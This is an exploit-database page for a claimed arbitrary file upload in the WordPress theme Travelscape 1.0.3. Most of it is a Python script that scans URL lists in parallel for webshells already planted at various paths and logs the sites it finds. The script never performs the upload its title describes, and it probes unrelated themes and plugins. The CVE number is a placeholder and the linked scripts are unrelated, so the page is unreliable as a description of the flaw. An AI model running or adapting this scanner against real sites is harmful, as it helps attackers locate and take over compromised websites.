header-logo
Suggest Exploit
vendor:
Travelscape
by:
Milad Karimi (Ex3ptionaL)
8.1
CVSS
CRITICAL
Arbitrary File Upload
434
CWE
Product Name: Travelscape
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: CVE-2024-XXXX
CPE: a:wordpress_theme:travelscape:1.0.3
Metasploit:
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/http/prtg_authenticated_rcehttps://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/backupexec/ssl_uafhttps://www.infosecmatter.com/nessus-plugin-library/?id=18405https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/nscp_pehttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/admin/networking/cisco_asa_extrabacon
Platforms Tested: Windows 10, Firefox
2024

Arbitrary File Upload in WordPress Theme Travelscape v1.0.3

The vulnerability allows an attacker to upload arbitrary files to the server using the Wordpress Theme Travelscape v1.0.3. This could lead to remote code execution and compromise the website. This vulnerability has been assigned CVE-ID: CVE-2024-XXXX.

Mitigation:

Update to the latest version of the Wordpress Theme Travelscape to prevent exploitation of this vulnerability. Additionally, restrict file upload permissions and sanitize user inputs to mitigate the risk.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
requests.urllib3.disable_warnings()
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
Mobile Safari/537.36',
    'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',

    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
}
def URLdomain(url):
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url
def check_security(url):
    fg = success_color
    fr = error_color
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url +
'/wp-content/themes/travelscape/json.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/travelscape/json.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
'/wp-content/themes/aahana/json.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        check = requests.get(url + '/wp-content/themes/travel/issue.php',
headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url +
'/wp-content/themes/travel/issue.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/about.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/about.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url +
'/wp-content/themes/digital-download/new.php', headers=headers,
allow_redirects=True, timeout=15)
        if '#0x2525' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('digital-download.txt', 'a').write(url +
'/wp-content/themes/digital-download/new.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers,
allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php',
headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url +
'/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file
containing URLs: ")
        if not os.path.isfile(url_file_path):
            print(f"{error_color}[ERROR] The specified file path is
invalid.")
            sys.exit(1)
    try:
        urls_to_check = [line.strip() for line in open(url_file_path, 'r',
encoding='utf-8').readlines()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the
file: {e}")
        sys.exit(1)
    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully.
Results are saved in corresponding files.")
if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR